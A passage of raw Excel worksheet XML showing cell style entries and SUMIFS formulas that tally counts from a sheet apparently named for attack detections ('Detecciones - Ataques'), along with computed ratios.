      <c r="FY22" s="266"/>
      <c r="FZ22" s="266"/>
      <c r="GA22" s="266"/>
      <c r="GB22" s="266"/>
      <c r="GC22" s="266"/>
      <c r="GD22" s="266"/>
      <c r="GE22" s="266"/>
      <c r="GF22" s="266"/>
      <c r="GG22" s="266"/>
      <c r="GH22" s="266"/>
      <c r="GI22" s="266"/>
      <c r="GJ22" s="266"/>
      <c r="GK22" s="266"/>
      <c r="GL22" s="266"/>
      <c r="GM22" s="266"/>
      <c r="GN22" s="266"/>
      <c r="GO22" s="266"/>
      <c r="GP22" s="266"/>
      <c r="GQ22" s="266"/>
      <c r="GR22" s="266"/>
      <c r="GS22" s="266"/>
      <c r="GT22" s="266"/>
      <c r="GU22" s="266"/>
      <c r="GV22" s="266"/>
      <c r="GW22" s="266"/>
      <c r="GX22" s="266"/>
      <c r="GY22" s="266"/>
      <c r="GZ22" s="266"/>
      <c r="HA22" s="266"/>
      <c r="HB22" s="266"/>
      <c r="HC22" s="266"/>
      <c r="HD22" s="266"/>
      <c r="HE22" s="266"/>
      <c r="HF22" s="266"/>
      <c r="HG22" s="266"/>
      <c r="HH22" s="266"/>
      <c r="HI22" s="266"/>
      <c r="HJ22" s="266"/>
      <c r="HK22" s="266"/>
      <c r="HL22" s="266"/>
      <c r="HM22" s="266"/>
      <c r="HN22" s="266"/>
      <c r="HO22" s="266"/>
      <c r="HP22" s="266"/>
    </row>
    <row r="23">
      <c r="FK23" s="265"/>
      <c r="FL23" s="266"/>
      <c r="FM23" s="266"/>
      <c r="FN23" s="267"/>
      <c r="FO23" s="267"/>
      <c r="FP23" s="267"/>
      <c r="FQ23" s="267"/>
      <c r="FR23" s="267"/>
      <c r="FS23" s="267"/>
      <c r="FT23" s="267"/>
      <c r="FU23" s="267"/>
      <c r="FV23" s="267"/>
      <c r="FW23" s="267"/>
      <c r="FX23" s="267"/>
      <c r="FY23" s="267"/>
      <c r="FZ23" s="267"/>
      <c r="GA23" s="267"/>
      <c r="GB23" s="267"/>
      <c r="GC23" s="267"/>
      <c r="GD23" s="267"/>
      <c r="GE23" s="267"/>
      <c r="GF23" s="267"/>
      <c r="GG23" s="267"/>
      <c r="GH23" s="267"/>
      <c r="GI23" s="267"/>
      <c r="GJ23" s="267"/>
      <c r="GK23" s="267"/>
      <c r="GL23" s="267"/>
      <c r="GM23" s="267"/>
      <c r="GN23" s="267"/>
      <c r="GO23" s="267"/>
      <c r="GP23" s="267"/>
      <c r="GQ23" s="267"/>
      <c r="GR23" s="267"/>
      <c r="GS23" s="267"/>
      <c r="GT23" s="267"/>
      <c r="GU23" s="267"/>
      <c r="GV23" s="267"/>
      <c r="GW23" s="267"/>
      <c r="GX23" s="267"/>
      <c r="GY23" s="267"/>
      <c r="GZ23" s="267"/>
      <c r="HA23" s="267"/>
      <c r="HB23" s="267"/>
      <c r="HC23" s="267"/>
      <c r="HD23" s="267"/>
      <c r="HE23" s="267"/>
      <c r="HF23" s="267"/>
      <c r="HG23" s="267"/>
      <c r="HH23" s="267"/>
      <c r="HI23" s="267"/>
      <c r="HJ23" s="267"/>
      <c r="HK23" s="267"/>
      <c r="HL23" s="267"/>
      <c r="HM23" s="267"/>
      <c r="HN23" s="267"/>
      <c r="HO23" s="267"/>
      <c r="HP23" s="267"/>
    </row>
    <row r="24">
      <c r="B24" s="268"/>
      <c r="C24" s="269"/>
      <c r="D24" s="269"/>
      <c r="E24" s="269"/>
      <c r="F24" s="269"/>
      <c r="G24" s="270"/>
      <c r="J24" s="268"/>
      <c r="K24" s="269"/>
      <c r="L24" s="269"/>
      <c r="M24" s="269"/>
      <c r="N24" s="269"/>
      <c r="O24" s="270"/>
      <c r="Q24" s="271"/>
      <c r="R24" s="271"/>
      <c r="S24" s="271"/>
      <c r="T24" s="271"/>
      <c r="U24" s="271"/>
      <c r="V24" s="271"/>
      <c r="W24" s="271"/>
      <c r="X24" s="271"/>
      <c r="Y24" s="271"/>
      <c r="Z24" s="271"/>
      <c r="AA24" s="271"/>
      <c r="AB24" s="271"/>
      <c r="AC24" s="271"/>
      <c r="AD24" s="271"/>
      <c r="AE24" s="271"/>
      <c r="AF24" s="271"/>
      <c r="AG24" s="271"/>
      <c r="AH24" s="271"/>
      <c r="AI24" s="271"/>
      <c r="AJ24" s="271"/>
      <c r="AK24" s="271"/>
      <c r="AL24" s="271"/>
      <c r="AM24" s="271"/>
      <c r="AN24" s="271"/>
      <c r="AO24" s="271"/>
      <c r="AP24" s="271"/>
      <c r="AQ24" s="271"/>
      <c r="AR24" s="271"/>
      <c r="AS24" s="271"/>
      <c r="AT24" s="271"/>
      <c r="AU24" s="271"/>
      <c r="AV24" s="271"/>
      <c r="AW24" s="271"/>
      <c r="AX24" s="271"/>
      <c r="AY24" s="271"/>
      <c r="AZ24" s="271"/>
      <c r="BA24" s="271"/>
      <c r="BB24" s="271"/>
      <c r="BC24" s="271"/>
      <c r="BD24" s="271"/>
      <c r="BE24" s="271"/>
      <c r="BF24" s="271"/>
      <c r="BG24" s="271"/>
      <c r="BH24" s="271"/>
      <c r="BI24" s="271"/>
      <c r="BJ24" s="271"/>
      <c r="BK24" s="271"/>
      <c r="BL24" s="271"/>
      <c r="BM24" s="271"/>
      <c r="BN24" s="271"/>
      <c r="BO24" s="271"/>
      <c r="BP24" s="271"/>
      <c r="BQ24" s="271"/>
      <c r="BR24" s="271"/>
      <c r="BS24" s="271"/>
      <c r="BT24" s="271"/>
      <c r="BU24" s="271"/>
      <c r="BV24" s="271"/>
      <c r="BW24" s="271"/>
      <c r="BX24" s="271"/>
      <c r="BY24" s="271"/>
      <c r="BZ24" s="271"/>
      <c r="CA24" s="271"/>
      <c r="CB24" s="271"/>
      <c r="CC24" s="271"/>
      <c r="CD24" s="271"/>
      <c r="CE24" s="271"/>
      <c r="CF24" s="271"/>
      <c r="CG24" s="271"/>
      <c r="CH24" s="271"/>
      <c r="CI24" s="271"/>
      <c r="CJ24" s="271"/>
      <c r="CK24" s="271"/>
      <c r="CL24" s="271"/>
      <c r="CM24" s="271"/>
      <c r="CN24" s="271"/>
      <c r="CO24" s="271"/>
      <c r="CP24" s="271"/>
      <c r="CQ24" s="271"/>
      <c r="CR24" s="271"/>
      <c r="CS24" s="271"/>
      <c r="CT24" s="271"/>
      <c r="CU24" s="271"/>
      <c r="CV24" s="271"/>
      <c r="CW24" s="271"/>
      <c r="CX24" s="271"/>
      <c r="CY24" s="271"/>
      <c r="CZ24" s="271"/>
      <c r="DA24" s="271"/>
      <c r="DB24" s="271"/>
      <c r="DC24" s="271"/>
      <c r="DD24" s="271"/>
      <c r="DE24" s="271"/>
      <c r="DF24" s="271"/>
      <c r="DG24" s="271"/>
      <c r="DH24" s="271"/>
      <c r="DI24" s="271"/>
      <c r="DJ24" s="271"/>
      <c r="DK24" s="271"/>
      <c r="DO24" s="272"/>
      <c r="DP24" s="273"/>
      <c r="DQ24" s="273"/>
      <c r="DR24" s="273"/>
      <c r="DS24" s="273"/>
      <c r="DT24" s="273"/>
      <c r="DU24" s="273"/>
      <c r="DV24" s="273"/>
      <c r="DW24" s="273"/>
      <c r="DX24" s="273"/>
      <c r="DY24" s="273"/>
      <c r="DZ24" s="273"/>
      <c r="EA24" s="273"/>
      <c r="EB24" s="273"/>
      <c r="EC24" s="273"/>
      <c r="ED24" s="274"/>
      <c r="FK24" s="275" t="s">
        <v>2417</v>
      </c>
      <c r="FL24" s="2"/>
      <c r="FM24" s="2"/>
      <c r="FN24" s="2"/>
      <c r="FO24" s="3"/>
      <c r="FQ24" s="275" t="s">
        <v>2418</v>
      </c>
      <c r="FR24" s="2"/>
      <c r="FS24" s="2"/>
      <c r="FT24" s="2"/>
      <c r="FU24" s="3"/>
      <c r="FV24" s="276"/>
    </row>
    <row r="25">
      <c r="B25" s="277"/>
      <c r="C25" s="271"/>
      <c r="D25" s="271"/>
      <c r="E25" s="271"/>
      <c r="F25" s="271"/>
      <c r="G25" s="278"/>
      <c r="J25" s="277"/>
      <c r="K25" s="271"/>
      <c r="L25" s="271"/>
      <c r="M25" s="271"/>
      <c r="N25" s="271"/>
      <c r="O25" s="278"/>
      <c r="Q25" s="271"/>
      <c r="R25" s="271"/>
      <c r="S25" s="271"/>
      <c r="T25" s="271"/>
      <c r="U25" s="271"/>
      <c r="V25" s="271"/>
      <c r="W25" s="271"/>
      <c r="X25" s="271"/>
      <c r="Y25" s="271"/>
      <c r="Z25" s="271"/>
      <c r="AA25" s="271"/>
      <c r="AB25" s="271"/>
      <c r="AC25" s="271"/>
      <c r="AD25" s="271"/>
      <c r="AE25" s="271"/>
      <c r="AF25" s="271"/>
      <c r="AG25" s="271"/>
      <c r="AH25" s="271"/>
      <c r="AI25" s="271"/>
      <c r="AJ25" s="271"/>
      <c r="AK25" s="271"/>
      <c r="AL25" s="271"/>
      <c r="AM25" s="271"/>
      <c r="AN25" s="271"/>
      <c r="AO25" s="271"/>
      <c r="AP25" s="271"/>
      <c r="AQ25" s="271"/>
      <c r="AR25" s="271"/>
      <c r="AS25" s="271"/>
      <c r="AT25" s="271"/>
      <c r="AU25" s="271"/>
      <c r="AV25" s="271"/>
      <c r="AW25" s="271"/>
      <c r="AX25" s="271"/>
      <c r="AY25" s="271"/>
      <c r="AZ25" s="271"/>
      <c r="BA25" s="271"/>
      <c r="BB25" s="271"/>
      <c r="BC25" s="271"/>
      <c r="BD25" s="271"/>
      <c r="BE25" s="271"/>
      <c r="BF25" s="271"/>
      <c r="BG25" s="271"/>
      <c r="BH25" s="271"/>
      <c r="BI25" s="271"/>
      <c r="BJ25" s="271"/>
      <c r="BK25" s="271"/>
      <c r="BL25" s="271"/>
      <c r="BM25" s="271"/>
      <c r="BN25" s="271"/>
      <c r="BO25" s="271"/>
      <c r="BP25" s="271"/>
      <c r="BQ25" s="271"/>
      <c r="BR25" s="271"/>
      <c r="BS25" s="271"/>
      <c r="BT25" s="271"/>
      <c r="BU25" s="271"/>
      <c r="BV25" s="271"/>
      <c r="BW25" s="271"/>
      <c r="BX25" s="271"/>
      <c r="BY25" s="271"/>
      <c r="BZ25" s="271"/>
      <c r="CA25" s="271"/>
      <c r="CB25" s="271"/>
      <c r="CC25" s="271"/>
      <c r="CD25" s="271"/>
      <c r="CE25" s="271"/>
      <c r="CF25" s="271"/>
      <c r="CG25" s="271"/>
      <c r="CH25" s="271"/>
      <c r="CI25" s="271"/>
      <c r="CJ25" s="271"/>
      <c r="CK25" s="271"/>
      <c r="CL25" s="271"/>
      <c r="CM25" s="271"/>
      <c r="CN25" s="271"/>
      <c r="CO25" s="271"/>
      <c r="CP25" s="271"/>
      <c r="CQ25" s="271"/>
      <c r="CR25" s="271"/>
      <c r="CS25" s="271"/>
      <c r="CT25" s="271"/>
      <c r="CU25" s="271"/>
      <c r="CV25" s="271"/>
      <c r="CW25" s="271"/>
      <c r="CX25" s="271"/>
      <c r="CY25" s="271"/>
      <c r="CZ25" s="271"/>
      <c r="DA25" s="271"/>
      <c r="DB25" s="271"/>
      <c r="DC25" s="271"/>
      <c r="DD25" s="271"/>
      <c r="DE25" s="271"/>
      <c r="DF25" s="271"/>
      <c r="DG25" s="271"/>
      <c r="DH25" s="271"/>
      <c r="DI25" s="271"/>
      <c r="DJ25" s="271"/>
      <c r="DK25" s="271"/>
      <c r="DO25" s="279"/>
      <c r="DP25" s="271"/>
      <c r="DQ25" s="271"/>
      <c r="DR25" s="271"/>
      <c r="DS25" s="271"/>
      <c r="DT25" s="271"/>
      <c r="DU25" s="271"/>
      <c r="DV25" s="271"/>
      <c r="DW25" s="271"/>
      <c r="DX25" s="271"/>
      <c r="DY25" s="271"/>
      <c r="DZ25" s="271"/>
      <c r="EA25" s="271"/>
      <c r="EB25" s="271"/>
      <c r="EC25" s="271"/>
      <c r="ED25" s="280"/>
      <c r="EG25" s="272"/>
      <c r="EH25" s="273"/>
      <c r="EI25" s="273"/>
      <c r="EJ25" s="273"/>
      <c r="EK25" s="273"/>
      <c r="EL25" s="273"/>
      <c r="EM25" s="273"/>
      <c r="EN25" s="273"/>
      <c r="EO25" s="273"/>
      <c r="EP25" s="273"/>
      <c r="EQ25" s="273"/>
      <c r="ER25" s="273"/>
      <c r="ES25" s="273"/>
      <c r="ET25" s="273"/>
      <c r="EU25" s="273"/>
      <c r="EV25" s="273"/>
      <c r="EW25" s="273"/>
      <c r="EX25" s="273"/>
      <c r="EY25" s="273"/>
      <c r="EZ25" s="273"/>
      <c r="FA25" s="274"/>
      <c r="FC25" s="281" t="s">
        <v>2419</v>
      </c>
      <c r="FD25" s="221"/>
      <c r="FE25" s="221"/>
      <c r="FF25" s="221"/>
      <c r="FG25" s="221"/>
      <c r="FH25" s="222"/>
      <c r="FK25" s="282"/>
      <c r="FL25" s="283" t="s">
        <v>2420</v>
      </c>
      <c r="FM25" s="283" t="s">
        <v>2421</v>
      </c>
      <c r="FN25" s="283" t="s">
        <v>2422</v>
      </c>
      <c r="FO25" s="283" t="s">
        <v>2423</v>
      </c>
      <c r="FP25" s="284"/>
      <c r="FQ25" s="282"/>
      <c r="FR25" s="283" t="s">
        <v>2424</v>
      </c>
      <c r="FS25" s="283" t="s">
        <v>2425</v>
      </c>
      <c r="FT25" s="283" t="s">
        <v>2426</v>
      </c>
      <c r="FU25" s="283" t="s">
        <v>2427</v>
      </c>
      <c r="FV25" s="284"/>
      <c r="FW25" s="284"/>
      <c r="FX25" s="284"/>
      <c r="FY25" s="284"/>
      <c r="FZ25" s="285" t="s">
        <v>2428</v>
      </c>
      <c r="GD25" s="284"/>
      <c r="GE25" s="284"/>
      <c r="GF25" s="284"/>
      <c r="GG25" s="284"/>
      <c r="GH25" s="284"/>
      <c r="GI25" s="284"/>
      <c r="GJ25" s="284"/>
      <c r="GK25" s="284"/>
      <c r="GL25" s="284"/>
      <c r="GM25" s="284"/>
      <c r="GN25" s="284"/>
      <c r="GO25" s="284"/>
      <c r="GP25" s="284"/>
      <c r="GQ25" s="284"/>
      <c r="GR25" s="284"/>
      <c r="GS25" s="284"/>
      <c r="GT25" s="284"/>
      <c r="GU25" s="284"/>
      <c r="GV25" s="284"/>
      <c r="GW25" s="284"/>
      <c r="GX25" s="284"/>
      <c r="GY25" s="284"/>
      <c r="GZ25" s="284"/>
      <c r="HA25" s="284"/>
      <c r="HB25" s="284"/>
      <c r="HC25" s="286" t="s">
        <v>2429</v>
      </c>
      <c r="HD25" s="221"/>
      <c r="HE25" s="221"/>
      <c r="HF25" s="221"/>
      <c r="HG25" s="222"/>
      <c r="HH25" s="284"/>
      <c r="HI25" s="284"/>
      <c r="HJ25" s="284"/>
      <c r="HK25" s="284"/>
      <c r="HL25" s="284"/>
      <c r="HM25" s="284"/>
      <c r="HN25" s="284"/>
      <c r="HO25" s="284"/>
      <c r="HP25" s="284"/>
    </row>
    <row r="26">
      <c r="B26" s="277"/>
      <c r="C26" s="287" t="s">
        <v>2430</v>
      </c>
      <c r="D26" s="221"/>
      <c r="E26" s="221"/>
      <c r="F26" s="222"/>
      <c r="G26" s="278"/>
      <c r="J26" s="277"/>
      <c r="K26" s="288" t="s">
        <v>2431</v>
      </c>
      <c r="L26" s="289"/>
      <c r="M26" s="289"/>
      <c r="N26" s="290"/>
      <c r="O26" s="278"/>
      <c r="Q26" s="271"/>
      <c r="R26" s="291" t="s">
        <v>2432</v>
      </c>
      <c r="S26" s="292"/>
      <c r="T26" s="292"/>
      <c r="U26" s="292"/>
      <c r="V26" s="292"/>
      <c r="W26" s="292"/>
      <c r="X26" s="292"/>
      <c r="Y26" s="292"/>
      <c r="Z26" s="292"/>
      <c r="AA26" s="292"/>
      <c r="AB26" s="292"/>
      <c r="AC26" s="292"/>
      <c r="AD26" s="292"/>
      <c r="AE26" s="292"/>
      <c r="AF26" s="293"/>
      <c r="AG26" s="271"/>
      <c r="AH26" s="294" t="s">
        <v>2433</v>
      </c>
      <c r="AI26" s="292"/>
      <c r="AJ26" s="292"/>
      <c r="AK26" s="292"/>
      <c r="AL26" s="292"/>
      <c r="AM26" s="292"/>
      <c r="AN26" s="292"/>
      <c r="AO26" s="292"/>
      <c r="AP26" s="292"/>
      <c r="AQ26" s="292"/>
      <c r="AR26" s="292"/>
      <c r="AS26" s="292"/>
      <c r="AT26" s="292"/>
      <c r="AU26" s="292"/>
      <c r="AV26" s="292"/>
      <c r="AW26" s="292"/>
      <c r="AX26" s="292"/>
      <c r="AY26" s="292"/>
      <c r="AZ26" s="292"/>
      <c r="BA26" s="292"/>
      <c r="BB26" s="292"/>
      <c r="BC26" s="292"/>
      <c r="BD26" s="292"/>
      <c r="BE26" s="292"/>
      <c r="BF26" s="292"/>
      <c r="BG26" s="292"/>
      <c r="BH26" s="292"/>
      <c r="BI26" s="292"/>
      <c r="BJ26" s="292"/>
      <c r="BK26" s="292"/>
      <c r="BL26" s="292"/>
      <c r="BM26" s="292"/>
      <c r="BN26" s="292"/>
      <c r="BO26" s="292"/>
      <c r="BP26" s="292"/>
      <c r="BQ26" s="292"/>
      <c r="BR26" s="292"/>
      <c r="BS26" s="292"/>
      <c r="BT26" s="292"/>
      <c r="BU26" s="292"/>
      <c r="BV26" s="292"/>
      <c r="BW26" s="292"/>
      <c r="BX26" s="292"/>
      <c r="BY26" s="292"/>
      <c r="BZ26" s="292"/>
      <c r="CA26" s="292"/>
      <c r="CB26" s="292"/>
      <c r="CC26" s="292"/>
      <c r="CD26" s="292"/>
      <c r="CE26" s="292"/>
      <c r="CF26" s="292"/>
      <c r="CG26" s="292"/>
      <c r="CH26" s="292"/>
      <c r="CI26" s="292"/>
      <c r="CJ26" s="292"/>
      <c r="CK26" s="292"/>
      <c r="CL26" s="292"/>
      <c r="CM26" s="292"/>
      <c r="CN26" s="292"/>
      <c r="CO26" s="292"/>
      <c r="CP26" s="292"/>
      <c r="CQ26" s="292"/>
      <c r="CR26" s="292"/>
      <c r="CS26" s="292"/>
      <c r="CT26" s="292"/>
      <c r="CU26" s="292"/>
      <c r="CV26" s="292"/>
      <c r="CW26" s="292"/>
      <c r="CX26" s="292"/>
      <c r="CY26" s="292"/>
      <c r="CZ26" s="292"/>
      <c r="DA26" s="292"/>
      <c r="DB26" s="292"/>
      <c r="DC26" s="292"/>
      <c r="DD26" s="292"/>
      <c r="DE26" s="292"/>
      <c r="DF26" s="292"/>
      <c r="DG26" s="292"/>
      <c r="DH26" s="292"/>
      <c r="DI26" s="292"/>
      <c r="DJ26" s="293"/>
      <c r="DK26" s="271"/>
      <c r="DO26" s="295"/>
      <c r="DP26" s="275" t="s">
        <v>2434</v>
      </c>
      <c r="DQ26" s="2"/>
      <c r="DR26" s="2"/>
      <c r="DS26" s="2"/>
      <c r="DT26" s="2"/>
      <c r="DU26" s="3"/>
      <c r="DV26" s="271"/>
      <c r="DW26" s="275" t="s">
        <v>2435</v>
      </c>
      <c r="DX26" s="2"/>
      <c r="DY26" s="2"/>
      <c r="DZ26" s="2"/>
      <c r="EA26" s="2"/>
      <c r="EB26" s="3"/>
      <c r="EC26" s="271"/>
      <c r="ED26" s="280"/>
      <c r="EG26" s="279"/>
      <c r="EH26" s="296"/>
      <c r="EI26" s="297" t="s">
        <v>2436</v>
      </c>
      <c r="EJ26" s="221"/>
      <c r="EK26" s="221"/>
      <c r="EL26" s="221"/>
      <c r="EM26" s="221"/>
      <c r="EN26" s="222"/>
      <c r="EO26" s="296"/>
      <c r="EP26" s="296"/>
      <c r="EQ26" s="296"/>
      <c r="ER26" s="296"/>
      <c r="ES26" s="296"/>
      <c r="ET26" s="296"/>
      <c r="EU26" s="296"/>
      <c r="EV26" s="297" t="s">
        <v>2437</v>
      </c>
      <c r="EW26" s="221"/>
      <c r="EX26" s="221"/>
      <c r="EY26" s="221"/>
      <c r="EZ26" s="222"/>
      <c r="FA26" s="298"/>
      <c r="FC26" s="299"/>
      <c r="FD26" s="46"/>
      <c r="FE26" s="300" t="s">
        <v>6</v>
      </c>
      <c r="FF26" s="301" t="s">
        <v>7</v>
      </c>
      <c r="FG26" s="301" t="s">
        <v>8</v>
      </c>
      <c r="FH26" s="302" t="s">
        <v>9</v>
      </c>
      <c r="FK26" s="303" t="s">
        <v>2093</v>
      </c>
      <c r="FL26" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK26,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK26 &amp; "*")</f>
        <v>4</v>
      </c>
      <c r="FM26" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK26,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK26 &amp; "*")</f>
        <v>16</v>
      </c>
      <c r="FN26" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK26,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK26 &amp; "*")</f>
        <v>26</v>
      </c>
      <c r="FO26" s="304">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK26,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK26 &amp; "*")</f>
        <v>33</v>
      </c>
      <c r="FP26" s="305"/>
      <c r="FQ26" s="303" t="s">
        <v>2093</v>
      </c>
      <c r="FR26" s="69">
        <f t="shared" ref="FR26:FU26" si="1">1-(FL26/EJ28)</f>
        <v>0</v>
      </c>
      <c r="FS26" s="69">
        <f t="shared" si="1"/>
        <v>0.2</v>
      </c>
      <c r="FT26" s="69">
        <f t="shared" si="1"/>
        <v>0.1333333333</v>
      </c>
      <c r="FU26" s="306">
        <f t="shared" si="1"/>
        <v>0.3265306122</v>
      </c>
      <c r="FV26" s="305"/>
      <c r="FW26" s="305"/>
      <c r="FX26" s="305"/>
      <c r="FY26" s="305"/>
      <c r="FZ26" s="305"/>
      <c r="GA26" s="305"/>
      <c r="GB26" s="305"/>
      <c r="GC26" s="305"/>
      <c r="GD26" s="305"/>
      <c r="GE26" s="305"/>
      <c r="GF26" s="305"/>
      <c r="GG26" s="307" t="s">
        <v>2438</v>
      </c>
      <c r="GH26" s="289"/>
      <c r="GI26" s="289"/>
      <c r="GJ26" s="290"/>
      <c r="GK26" s="307" t="s">
        <v>2439</v>
      </c>
      <c r="GL26" s="289"/>
      <c r="GM26" s="289"/>
      <c r="GN26" s="290"/>
      <c r="GO26" s="307" t="s">
        <v>2440</v>
      </c>
      <c r="GP26" s="289"/>
      <c r="GQ26" s="289"/>
      <c r="GR26" s="290"/>
      <c r="GS26" s="308" t="s">
        <v>2441</v>
      </c>
      <c r="GT26" s="292"/>
      <c r="GU26" s="292"/>
      <c r="GV26" s="293"/>
      <c r="GW26" s="305"/>
      <c r="GX26" s="305"/>
      <c r="GY26" s="305"/>
      <c r="GZ26" s="305"/>
      <c r="HA26" s="305"/>
      <c r="HB26" s="305"/>
      <c r="HC26" s="305"/>
      <c r="HD26" s="305" t="s">
        <v>226</v>
      </c>
      <c r="HF26" s="305" t="s">
        <v>306</v>
      </c>
      <c r="HH26" s="305"/>
      <c r="HI26" s="305"/>
      <c r="HJ26" s="305"/>
      <c r="HK26" s="305"/>
      <c r="HL26" s="305"/>
      <c r="HM26" s="305"/>
      <c r="HN26" s="305"/>
      <c r="HO26" s="305"/>
      <c r="HP26" s="305"/>
    </row>
    <row r="27" ht="42.75" customHeight="1">
      <c r="B27" s="277"/>
      <c r="C27" s="309" t="s">
        <v>2442</v>
      </c>
      <c r="D27" s="310" t="s">
        <v>16</v>
      </c>
      <c r="E27" s="310" t="s">
        <v>14</v>
      </c>
      <c r="F27" s="311" t="s">
        <v>18</v>
      </c>
      <c r="G27" s="278"/>
      <c r="J27" s="277"/>
      <c r="K27" s="312" t="s">
        <v>2443</v>
      </c>
      <c r="L27" s="313" t="s">
        <v>2444</v>
      </c>
      <c r="M27" s="313" t="s">
        <v>2445</v>
      </c>
      <c r="N27" s="314" t="s">
        <v>2446</v>
      </c>
      <c r="O27" s="278"/>
      <c r="Q27" s="271"/>
      <c r="R27" s="315" t="s">
        <v>2447</v>
      </c>
      <c r="S27" s="316" t="s">
        <v>2093</v>
      </c>
      <c r="T27" s="316" t="s">
        <v>2013</v>
      </c>
      <c r="U27" s="316" t="s">
        <v>951</v>
      </c>
      <c r="V27" s="316" t="s">
        <v>633</v>
      </c>
      <c r="W27" s="316" t="s">
        <v>1725</v>
      </c>
      <c r="X27" s="316" t="s">
        <v>244</v>
      </c>
      <c r="Y27" s="316" t="s">
        <v>427</v>
      </c>
      <c r="Z27" s="316" t="s">
        <v>1373</v>
      </c>
      <c r="AA27" s="316" t="s">
        <v>209</v>
      </c>
      <c r="AB27" s="316" t="s">
        <v>664</v>
      </c>
      <c r="AC27" s="316" t="s">
        <v>357</v>
      </c>
      <c r="AD27" s="316" t="s">
        <v>310</v>
      </c>
      <c r="AE27" s="316" t="s">
        <v>292</v>
      </c>
      <c r="AF27" s="317" t="s">
        <v>558</v>
      </c>
      <c r="AG27" s="271"/>
      <c r="AH27" s="315" t="s">
        <v>2447</v>
      </c>
      <c r="AI27" s="318" t="s">
        <v>2108</v>
      </c>
      <c r="AJ27" s="319" t="s">
        <v>2177</v>
      </c>
      <c r="AK27" s="318" t="s">
        <v>2193</v>
      </c>
      <c r="AL27" s="318" t="s">
        <v>2095</v>
      </c>
      <c r="AM27" s="318" t="s">
        <v>2074</v>
      </c>
      <c r="AN27" s="318" t="s">
        <v>2061</v>
      </c>
      <c r="AO27" s="318" t="s">
        <v>2015</v>
      </c>
      <c r="AP27" s="318" t="s">
        <v>953</v>
      </c>
      <c r="AQ27" s="318" t="s">
        <v>1040</v>
      </c>
      <c r="AR27" s="318" t="s">
        <v>1012</v>
      </c>
      <c r="AS27" s="318" t="s">
        <v>1164</v>
      </c>
      <c r="AT27" s="318" t="s">
        <v>1848</v>
      </c>
      <c r="AU27" s="318" t="s">
        <v>2300</v>
      </c>
      <c r="AV27" s="318" t="s">
        <v>1138</v>
      </c>
      <c r="AW27" s="318" t="s">
        <v>974</v>
      </c>
      <c r="AX27" s="318" t="s">
        <v>1108</v>
      </c>
      <c r="AY27" s="318" t="s">
        <v>1702</v>
      </c>
      <c r="AZ27" s="318" t="s">
        <v>1626</v>
      </c>
      <c r="BA27" s="320" t="s">
        <v>636</v>
      </c>
      <c r="BB27" s="318" t="s">
        <v>1726</v>
      </c>
      <c r="BC27" s="318" t="s">
        <v>822</v>
      </c>
      <c r="BD27" s="318" t="s">
        <v>445</v>
      </c>
      <c r="BE27" s="318" t="s">
        <v>1747</v>
      </c>
      <c r="BF27" s="318" t="s">
        <v>989</v>
      </c>
      <c r="BG27" s="318" t="s">
        <v>246</v>
      </c>
      <c r="BH27" s="318" t="s">
        <v>2242</v>
      </c>
      <c r="BI27" s="318" t="s">
        <v>1282</v>
      </c>
      <c r="BJ27" s="318" t="s">
        <v>429</v>
      </c>
      <c r="BK27" s="318" t="s">
        <v>912</v>
      </c>
      <c r="BL27" s="318" t="s">
        <v>1837</v>
      </c>
      <c r="BM27" s="318" t="s">
        <v>1510</v>
      </c>
      <c r="BN27" s="318" t="s">
        <v>1411</v>
      </c>
      <c r="BO27" s="318" t="s">
        <v>1397</v>
      </c>
      <c r="BP27" s="318" t="s">
        <v>1374</v>
      </c>
      <c r="BQ27" s="318" t="s">
        <v>677</v>
      </c>
      <c r="BR27" s="318" t="s">
        <v>790</v>
      </c>
      <c r="BS27" s="318" t="s">
        <v>262</v>
      </c>
      <c r="BT27" s="318" t="s">
        <v>771</v>
      </c>
      <c r="BU27" s="318" t="s">
        <v>724</v>
      </c>
      <c r="BV27" s="318" t="s">
        <v>211</v>
      </c>
      <c r="BW27" s="318" t="s">
        <v>805</v>
      </c>
      <c r="BX27" s="318" t="s">
        <v>932</v>
      </c>
      <c r="BY27" s="318" t="s">
        <v>1306</v>
      </c>
      <c r="BZ27" s="318" t="s">
        <v>1903</v>
      </c>
      <c r="CA27" s="318" t="s">
        <v>2335</v>
      </c>
      <c r="CB27" s="318" t="s">
        <v>1983</v>
      </c>
      <c r="CC27" s="318" t="s">
        <v>1999</v>
      </c>
      <c r="CD27" s="318" t="s">
        <v>1971</v>
      </c>
      <c r="CE27" s="318" t="s">
        <v>1201</v>
      </c>
      <c r="CF27" s="318" t="s">
        <v>750</v>
      </c>
      <c r="CG27" s="318" t="s">
        <v>666</v>
      </c>
      <c r="CH27" s="318" t="s">
        <v>892</v>
      </c>
      <c r="CI27" s="318" t="s">
        <v>1214</v>
      </c>
      <c r="CJ27" s="318" t="s">
